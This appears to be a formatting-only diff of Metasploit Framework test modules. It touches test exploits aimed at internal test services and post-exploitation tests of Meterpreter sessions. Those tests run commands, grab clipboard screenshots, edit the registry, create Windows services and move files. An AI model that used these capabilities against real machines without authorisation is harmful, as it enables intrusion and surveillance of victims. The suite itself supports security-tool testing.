||||
end
|
||||
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
@ -105,8 +105,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def exploit
|
||||
# Show disassembled payload for context encoder test
|
||||
if target.name =~ /context encoder/
|
||||
#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
|
||||
#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
|
||||
# puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
|
||||
# FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
|
||||
end
|
||||
|
||||
connect
|
||||
|
|
|
@ -8,8 +8,10 @@ require 'rex'
|
|||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
||||
def initialize( info = {} )
|
||||
super( update_info( info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Exec',
|
||||
'Description' => %q{ },
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -18,20 +20,23 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Platform' => [ 'java', 'linux' ],
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
|
||||
'Targets' =>
|
||||
'Targets' => [
|
||||
[
|
||||
[ 'Generic (Java Payload)', {
|
||||
'Generic (Java Payload)', {
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Platform' => 'java'
|
||||
} ],
|
||||
[ 'Linux', {
|
||||
}
|
||||
],
|
||||
[
|
||||
'Linux', {
|
||||
'Arch' => ARCH_X86,
|
||||
'Platform' => 'linux'
|
||||
} ],
|
||||
}
|
||||
],
|
||||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -47,4 +52,3 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -1,11 +1,12 @@
|
|||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => "IE Test for Javascript Libs",
|
||||
'Description' => %q{
|
||||
Tests Javascript hotness
|
||||
|
@ -15,14 +16,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'References' => [ [ 'URL', 'https://metasploit.com' ] ],
|
||||
'Platform' => 'win',
|
||||
'Targets' => [ [ 'Automatic', {} ] ],
|
||||
'Payload' =>
|
||||
{
|
||||
'Payload' => {
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => '2013-04-01',
|
||||
'DefaultTarget' => 0))
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def test_base64
|
||||
|
@ -72,12 +74,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
# Change the following to a specific function
|
||||
js = test_base64
|
||||
|
||||
|
||||
html = %Q|
|
||||
<!doctype html>
|
||||
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
|
||||
|
@ -95,8 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
</html>
|
||||
|
|
||||
|
||||
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache' })
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -3,7 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
#
|
||||
# This is a test exploit for testing kernel-mode payloads.
|
||||
#
|
||||
|
@ -14,22 +13,21 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
include Msf::Exploit::KernelMode
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Internal Kernel-mode Test Exploit',
|
||||
'Description' =>
|
||||
"This module tests the exploitation of a kernel-mode test service.",
|
||||
'Description' => "This module tests the exploitation of a kernel-mode test service.",
|
||||
'Author' => 'skape',
|
||||
'License' => MSF_LICENSE,
|
||||
'Arch' => 'x86',
|
||||
'Payload' =>
|
||||
{
|
||||
'Payload' => {
|
||||
'Space' => 1000,
|
||||
'MaxNops' => 0,
|
||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
|
||||
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
'Targets' => [
|
||||
[
|
||||
'Windows XP SP2',
|
||||
{
|
||||
|
@ -46,7 +44,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
],
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
|
@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
udp_sock.put(buf)
|
||||
|
||||
select(nil,nil,nil,2)
|
||||
select(nil, nil, nil, 2)
|
||||
|
||||
disconnect_udp
|
||||
end
|
||||
|
|
|
@ -3,14 +3,15 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Command Test',
|
||||
'Description' => %q{
|
||||
This module tests cmd payloads by targeting (for example) a server
|
||||
|
@ -18,23 +19,23 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' => 'egypt',
|
||||
'References' => [ ],
|
||||
'DefaultOptions' => { },
|
||||
'Payload' =>
|
||||
{
|
||||
'DefaultOptions' => {},
|
||||
'Payload' => {
|
||||
},
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Targeting', { } ],
|
||||
'Targets' => [
|
||||
[ 'Automatic Targeting', {} ],
|
||||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(31337),
|
||||
], self.class)
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
|
|
|
@ -9,13 +9,16 @@ class MetasploitModule < Msf::Post
|
|||
include Msf::Post::File
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Meterpreter cmd_exec test',
|
||||
'Description' => %q( This module will test the meterpreter cmd_exec API ),
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['windows', 'linux', 'unix'],
|
||||
'SessionTypes' => ['meterpreter']
|
||||
))
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def test_cmd_exec
|
||||
|
@ -107,6 +110,5 @@ class MetasploitModule < Msf::Post
|
|||
output == test_string
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,4 +1,3 @@
|
|||
|
||||
require 'rex'
|
||||
|
||||
lib = File.join(Msf::Config.install_root, "test", "lib")
|
||||
|
@ -9,23 +8,24 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
include Msf::ModuleTest::PostTest
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Test Meterpreter ExtAPI Stuff',
|
||||
'Description' => %q{ This module will test Windows Extended API methods },
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Ben Campbell'],
|
||||
'Platform' => [ 'windows', ],
|
||||
'SessionTypes' => [ 'meterpreter' ]
|
||||
))
|
||||
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
#
|
||||
# Check the extension is loaded...
|
||||
#
|
||||
def setup
|
||||
|
||||
unless session.extapi
|
||||
vprint_status("Loading extapi extension...")
|
||||
begin
|
||||
|
@ -60,9 +60,9 @@ class MetasploitModule < Msf::Post
|
|||
it "should return clipboard jpg dimensions" do
|
||||
ret = false
|
||||
|
||||
#VK_PRINTSCREEN 154 Maybe needed on XP?
|
||||
#VK_SNAPSHOT 44
|
||||
session.railgun.user32.keybd_event(44,0,0,0)
|
||||
# VK_PRINTSCREEN 154 Maybe needed on XP?
|
||||
# VK_SNAPSHOT 44
|
||||
session.railgun.user32.keybd_event(44, 0, 0, 0)
|
||||
session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0)
|
||||
|
||||
clipboard = session.extapi.clipboard.get_data(false)
|
||||
|
@ -103,15 +103,15 @@ class MetasploitModule < Msf::Post
|
|||
it "should download clipboard jpg data" do
|
||||
ret = false
|
||||
|
||||
#VK_PRINTSCREEN 154 Maybe needed on XP?
|
||||
#VK_SNAPSHOT 44
|
||||
session.railgun.user32.keybd_event(44,0,0,0)
|
||||
# VK_PRINTSCREEN 154 Maybe needed on XP?
|
||||
# VK_SNAPSHOT 44
|
||||
session.railgun.user32.keybd_event(44, 0, 0, 0)
|
||||
session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0)
|
||||
|
||||
clipboard = session.extapi.clipboard.get_data(true)
|
||||
if clipboard && clipboard.first && (clipboard.first[:type] == :jpg) && !(clipboard.first[:data].empty?)
|
||||
# JPG Magic Bytes
|
||||
ret = (clipboard.first[:data][0,2] == "\xFF\xD8")
|
||||
ret = (clipboard.first[:data][0, 2] == "\xFF\xD8")
|
||||
end
|
||||
|
||||
ret
|
||||
|
@ -183,14 +183,14 @@ class MetasploitModule < Msf::Post
|
|||
windows = session.extapi.window.enumerate(true, nil)
|
||||
|
||||
if windows && windows.any?
|
||||
unknowns = windows.select {|w| w[:title] == "<unknown>"}
|
||||
unknowns = windows.select { |w| w[:title] == "<unknown>" }
|
||||
ret = !unknowns.empty?
|
||||
end
|
||||
|
||||
ret
|
||||
end
|
||||
|
||||
parent = windows.select {|w| w[:title] =~ /program manager/i}
|
||||
parent = windows.select { |w| w[:title] =~ /program manager/i }
|
||||
|
||||
if parent && parent.first
|
||||
it "should return an array of a windows children" do
|
||||
|
|
|
@ -1,25 +1,27 @@
|
|||
|
||||
lib = File.join(Msf::Config.install_root, "test", "lib")
|
||||
require 'module_test'
|
||||
|
||||
#load 'test/lib/module_test.rb'
|
||||
#load 'lib/rex/text.rb'
|
||||
#load 'lib/msf/core/post/common.rb'
|
||||
# load 'test/lib/module_test.rb'
|
||||
# load 'lib/rex/text.rb'
|
||||
# load 'lib/msf/core/post/common.rb'
|
||||
|
||||
class MetasploitModule < Msf::Post
|
||||
|
||||
include Msf::ModuleTest::PostTest
|
||||
include Msf::Post::Common
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Test Post::Common Get Envs',
|
||||
'Description' => %q{ This module will test Post::Common get envs API methods },
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Ben Campbell'],
|
||||
'Platform' => [ 'windows', 'linux', 'java', 'python' ],
|
||||
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
||||
))
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def test_get_env_windows
|
||||
|
@ -52,7 +54,7 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
def test_get_envs
|
||||
it "should return multiple envs" do
|
||||
res = get_envs('PATH','USERNAME','USER')
|
||||
res = get_envs('PATH', 'USERNAME', 'USER')
|
||||
if session.platform =~ /win/i
|
||||
!res['PATH'].blank? && !res['USERNAME'].blank?
|
||||
else
|
||||
|
@ -62,4 +64,3 @@ class MetasploitModule < Msf::Post
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -1,4 +1,3 @@
|
|||
|
||||
require 'rex/post/meterpreter/extensions/stdapi/command_ids'
|
||||
require 'rex'
|
||||
|
||||
|
@ -10,20 +9,24 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
include Msf::ModuleTest::PostTest
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Testing Meterpreter Stuff',
|
||||
'Description' => %q{ This module will test meterpreter API methods },
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'egypt'],
|
||||
'Platform' => [ 'windows', 'linux', 'java' ],
|
||||
'SessionTypes' => [ 'meterpreter' ]
|
||||
))
|
||||
)
|
||||
)
|
||||
register_options(
|
||||
[
|
||||
OptBool.new("AddEntropy" , [false, "Add entropy token to file and directory names.", false]),
|
||||
OptString.new("BaseFileName" , [true, "File/dir base name", "meterpreter-test"])
|
||||
], self.class)
|
||||
OptBool.new("AddEntropy", [false, "Add entropy token to file and directory names.", false]),
|
||||
OptString.new("BaseFileName", [true, "File/dir base name", "meterpreter-test"])
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -81,7 +84,7 @@ class MetasploitModule < Msf::Post
|
|||
ret &&= (list && list.length > 0)
|
||||
if session.commands.include? Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_SYS_PROCESS_GETPID
|
||||
pid ||= session.sys.process.getpid
|
||||
process = list.find{ |p| p['pid'] == pid }
|
||||
process = list.find { |p| p['pid'] == pid }
|
||||
vprint_status("PID info: #{process.inspect}")
|
||||
ret &&= !(process.nil?)
|
||||
else
|
||||
|
@ -90,7 +93,6 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
ret
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def test_sys_config
|
||||
|
@ -125,7 +127,7 @@ class MetasploitModule < Msf::Post
|
|||
ifaces = session.net.config.get_interfaces
|
||||
res = !!(ifaces and ifaces.length > 0)
|
||||
|
||||
res &&= !! ifaces.find { |iface|
|
||||
res &&= !!ifaces.find { |iface|
|
||||
iface.addrs.find { |addr|
|
||||
addr == session.session_host
|
||||
}
|
||||
|
@ -141,13 +143,12 @@ class MetasploitModule < Msf::Post
|
|||
routes and routes.length > 0
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def test_fs
|
||||
vprint_status("Starting filesystem tests")
|
||||
if datastore["AddEntropy"]
|
||||
entropy_value = '-' + ('a'..'z').to_a.shuffle[0,8].join
|
||||
entropy_value = '-' + ('a'..'z').to_a.shuffle[0, 8].join
|
||||
else
|
||||
entropy_value = ""
|
||||
end
|
||||
|
@ -345,17 +346,16 @@ class MetasploitModule < Msf::Post
|
|||
local_md5 = Digest::MD5.digest(::File.read(local, mode: 'rb'))
|
||||
remote_sha = session.fs.file.sha1(remote)
|
||||
local_sha = Digest::SHA1.digest(::File.read(local, mode: 'rb'))
|
||||
vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5,'')}")
|
||||
vprint_status("local md5 : #{Rex::Text.to_hex(local_md5,'')}")
|
||||
vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha,'')}")
|
||||
vprint_status("local sha : #{Rex::Text.to_hex(local_sha,'')}")
|
||||
vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5, '')}")
|
||||
vprint_status("local md5 : #{Rex::Text.to_hex(local_md5, '')}")
|
||||
vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha, '')}")
|
||||
vprint_status("local sha : #{Rex::Text.to_hex(local_sha, '')}")
|
||||
res &&= (remote_md5 == local_md5)
|
||||
end
|
||||
|
||||
session.fs.file.rm(remote)
|
||||
res
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
=begin
|
||||
|
@ -387,7 +387,7 @@ class MetasploitModule < Msf::Post
|
|||
super
|
||||
end
|
||||
|
||||
protected
|
||||
protected
|
||||
|
||||
def create_directory(name)
|
||||
res = true
|
||||
|
@ -403,5 +403,4 @@ protected
|
|||
res
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
|
|
@ -1,5 +1,3 @@
|
|||
|
||||
|
||||
lib = File.join(Msf::Config.install_root, "test", "lib")
|
||||
require 'module_test'
|
||||
|
||||
|
@ -9,14 +7,17 @@ class MetasploitModule < Msf::Post
|
|||
include Msf::Post::File
|
||||
include Msf::Post::Windows::FileInfo
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Railgun API Tests',
|
||||
'Description' => %q{ This module will test railgun api functions },
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Spencer McIntyre' ],
|
||||
'Platform' => [ 'linux', 'osx', 'windows' ]
|
||||
))
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def test_api_function_calls_libc
|
||||
|
@ -89,6 +90,7 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
def test_api_function_file_info_windows
|
||||
return unless session.platform == 'windows'
|
||||
|
||||
it "Should retrieve the win32k file version" do
|
||||
path = expand_path('%WINDIR%\\system32\\win32k.sys')
|
||||
major, minor, build, revision, brand = file_version(path)
|
||||
|
@ -98,6 +100,7 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
def test_api_function_calls_windows
|
||||
return unless session.platform == 'windows'
|
||||
|
||||
it "Should include error information in the results" do
|
||||
ret = true
|
||||
result = session.railgun.kernel32.GetCurrentProcess()
|
||||
|
|
|
@ -1,4 +1,3 @@
|
|||
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
|
@ -14,14 +13,17 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
include Msf::ModuleTest::PostTest
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'railgun_testing',
|
||||
'Description' => %q{ This module will test railgun code used in post modules},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'kernelsmith'],
|
||||
'Platform' => [ 'windows' ]
|
||||
))
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
|
@ -29,28 +31,27 @@ class MetasploitModule < Msf::Post
|
|||
OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]),
|
||||
OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]),
|
||||
OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]),
|
||||
], self.class)
|
||||
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
#
|
||||
# Return an array of windows constants names matching +winconst+
|
||||
#
|
||||
def select_const_names(winconst, filter_regex=nil)
|
||||
def select_const_names(winconst, filter_regex = nil)
|
||||
session.railgun.constant_manager.select_const_names(winconst, filter_regex)
|
||||
end
|
||||
|
||||
#
|
||||
# Returns an array of windows error code names for a given windows error code matching +err_code+
|
||||
#
|
||||
def lookup_error(err_code, filter_regex=nil)
|
||||
def lookup_error(err_code, filter_regex = nil)
|
||||
select_const_names(err_code, /^ERROR_/).select do |name|
|
||||
name =~ filter_regex
|
||||
end
|
||||
end
|
||||
|
||||
def test_static
|
||||
|
||||
it "should return a constant name given a const and a filter" do
|
||||
ret = true
|
||||
results = select_const_names(4, /^SERVICE/)
|
||||
|
@ -78,16 +79,14 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
ret
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def test_datastore
|
||||
|
||||
if (datastore["WIN_CONST"])
|
||||
it "should look up arbitrary constants" do
|
||||
ret = true
|
||||
results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX'])
|
||||
#vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}")
|
||||
# vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}")
|
||||
|
||||
ret
|
||||
end
|
||||
|
@ -97,13 +96,10 @@ class MetasploitModule < Msf::Post
|
|||
it "should look up arbitrary error codes" do
|
||||
ret = true
|
||||
results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX'])
|
||||
#vprint_status("RESULTS: #{results.class} #{results.inspect}")
|
||||
# vprint_status("RESULTS: #{results.class} #{results.inspect}")
|
||||
|
||||
ret
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,3 @@
|
|||
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
|
@ -15,8 +14,10 @@ class MetasploitModule < Msf::Post
|
|||
include Msf::ModuleTest::PostTest
|
||||
include Msf::Post::Windows::Registry
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'registry_post_testing',
|
||||
'Description' => %q{ This module will test Post::Windows::Registry API methods },
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -25,7 +26,8 @@ class MetasploitModule < Msf::Post
|
|||
'egypt', # PostTest conversion
|
||||
],
|
||||
'Platform' => [ 'windows' ]
|
||||
))
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def test_0_registry_read
|
||||
|
@ -99,7 +101,6 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
ret
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def test_1_registry_write
|
||||
|
@ -172,7 +173,6 @@ class MetasploitModule < Msf::Post
|
|||
ret
|
||||
end
|
||||
|
||||
|
||||
it "should delete unicode keys" do
|
||||
ret = registry_deleteval(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str")
|
||||
valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str")
|
||||
|
@ -185,9 +185,6 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
ret
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,3 @@
|
|||
|
||||
require 'rex/post/meterpreter/extensions/stdapi/command_ids'
|
||||
require 'rex'
|
||||
|
||||
|
@ -10,20 +9,24 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
include Msf::ModuleTest::PostTest
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Testing Meterpreter Search',
|
||||
'Description' => %q{ This module will test the meterpreter search method },
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'timwr'],
|
||||
'Platform' => [ 'windows', 'linux', 'java' ],
|
||||
'SessionTypes' => [ 'meterpreter' ]
|
||||
))
|
||||
)
|
||||
)
|
||||
register_options(
|
||||
[
|
||||
OptBool.new("AddEntropy" , [false, "Add entropy token to file and directory names.", false]),
|
||||
OptString.new("BaseFileName" , [true, "File/dir base name", "meterpreter-test"])
|
||||
], self.class)
|
||||
OptBool.new("AddEntropy", [false, "Add entropy token to file and directory names.", false]),
|
||||
OptString.new("BaseFileName", [true, "File/dir base name", "meterpreter-test"])
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
def setup
|
||||
|
@ -38,7 +41,7 @@ class MetasploitModule < Msf::Post
|
|||
session.fs.dir.chdir(tmp)
|
||||
|
||||
if datastore["AddEntropy"]
|
||||
entropy_value = '-' + ('a'..'z').to_a.shuffle[0,8].join
|
||||
entropy_value = '-' + ('a'..'z').to_a.shuffle[0, 8].join
|
||||
else
|
||||
entropy_value = ""
|
||||
end
|
||||
|
|
|
@ -13,27 +13,31 @@ class MetasploitModule < Msf::Post
|
|||
include Msf::Post::Windows::Services
|
||||
include Msf::ModuleTest::PostTest
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Test Post::Windows::Services',
|
||||
'Description' => %q{ This module will test windows services methods within a shell},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'kernelsmith', 'egypt' ],
|
||||
'Platform' => [ 'windows' ],
|
||||
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
||||
))
|
||||
)
|
||||
)
|
||||
register_options(
|
||||
[
|
||||
OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]),
|
||||
OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]),
|
||||
OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]),
|
||||
OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]),
|
||||
OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]),
|
||||
OptEnum.new("MODE", [true, "Mode to use for startup/create tests", "auto",
|
||||
OptString.new("QSERVICE", [true, "Service (keyname) to query", "winmgmt"]),
|
||||
OptString.new("NSERVICE", [true, "New Service (keyname) to create/del", "testes"]),
|
||||
OptString.new("SSERVICE", [true, "Service (keyname) to start/stop", "W32Time"]),
|
||||
OptString.new("DNAME", [true, "Display name used for create test", "Cool display name"]),
|
||||
OptString.new("BINPATH", [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]),
|
||||
OptEnum.new("MODE", [
|
||||
true, "Mode to use for startup/create tests", "auto",
|
||||
["auto", "manual", "disable"]
|
||||
]),
|
||||
], self.class)
|
||||
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
def test_start
|
||||
|
@ -65,7 +69,7 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
ret &&= results.kind_of? Array
|
||||
ret &&= results.length > 0
|
||||
ret &&= results.select{|service| service[:name] == datastore["QSERVICE"]}
|
||||
ret &&= results.select { |service| service[:name] == datastore["QSERVICE"] }
|
||||
|
||||
ret
|
||||
end
|
||||
|
@ -160,7 +164,7 @@ class MetasploitModule < Msf::Post
|
|||
ret &&= results.kind_of? Hash
|
||||
if ret
|
||||
original_display = results[:display]
|
||||
results = service_change_config(service_name, {:display => Rex::Text.rand_text_alpha(5)})
|
||||
results = service_change_config(service_name, { :display => Rex::Text.rand_text_alpha(5) })
|
||||
ret &&= (results == Windows::Error::SUCCESS)
|
||||
|
||||
results = service_info(service_name)
|
||||
|
|
|
@ -1,12 +1,11 @@
|
|||
|
||||
lib = File.join(Msf::Config.install_root, "test", "lib")
|
||||
$:.push(lib) unless $:.include?(lib)
|
||||
require 'module_test'
|
||||
|
||||
#load 'test/lib/module_test.rb'
|
||||
#load 'lib/rex/text.rb'
|
||||
#load 'lib/msf/core/post/linux/system.rb'
|
||||
#load 'lib/msf/core/post/unix/enum_user_dirs.rb'
|
||||
# load 'test/lib/module_test.rb'
|
||||
# load 'lib/rex/text.rb'
|
||||
# load 'lib/msf/core/post/linux/system.rb'
|
||||
# load 'lib/msf/core/post/unix/enum_user_dirs.rb'
|
||||
|
||||
class MetasploitModule < Msf::Post
|
||||
|
||||
|
@ -15,15 +14,18 @@ class MetasploitModule < Msf::Post
|
|||
include Msf::Post::Unix
|
||||
include Msf::Post::Common
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Testing Remote Unix System Manipulation',
|
||||
'Description' => %q{ This module will test Post::File API methods },
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'egypt'],
|
||||
'Platform' => [ 'linux', 'java' ],
|
||||
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
||||
))
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def test_unix
|
||||
|
@ -36,6 +38,7 @@ class MetasploitModule < Msf::Post
|
|||
if ret
|
||||
users.each { |u|
|
||||
next unless u[:name] == "root"
|
||||
|
||||
have_root = true
|
||||
}
|
||||
end
|
||||
|
@ -44,8 +47,6 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
ret
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -4,4 +4,3 @@ Spec::Rake::SpecTask.new do |t|
|
|||
t.ruby_opts = ['-rtest/unit']
|
||||
t.spec_files = FileList['*_test.rb']
|
||||
end
|
||||
|
||||
|
|
|
@ -17,42 +17,40 @@ $msf = Msf::Simple::Framework.create
|
|||
|
||||
EXPLOITS = $msf.exploits
|
||||
|
||||
def print_line( message )
|
||||
$stdout.puts( message )
|
||||
def print_line(message)
|
||||
$stdout.puts(message)
|
||||
end
|
||||
|
||||
def format_badchars( badchars )
|
||||
def format_badchars(badchars)
|
||||
str = ''
|
||||
if( badchars )
|
||||
badchars.each_byte do | b |
|
||||
if (badchars)
|
||||
badchars.each_byte do |b|
|
||||
str << "\\x%02X" % [ b ]
|
||||
end
|
||||
end
|
||||
str
|
||||
end
|
||||
|
||||
def encoder_v_payload( encoder_name, payload, verbose=false )
|
||||
def encoder_v_payload(encoder_name, payload, verbose = false)
|
||||
success = 0
|
||||
fail = 0
|
||||
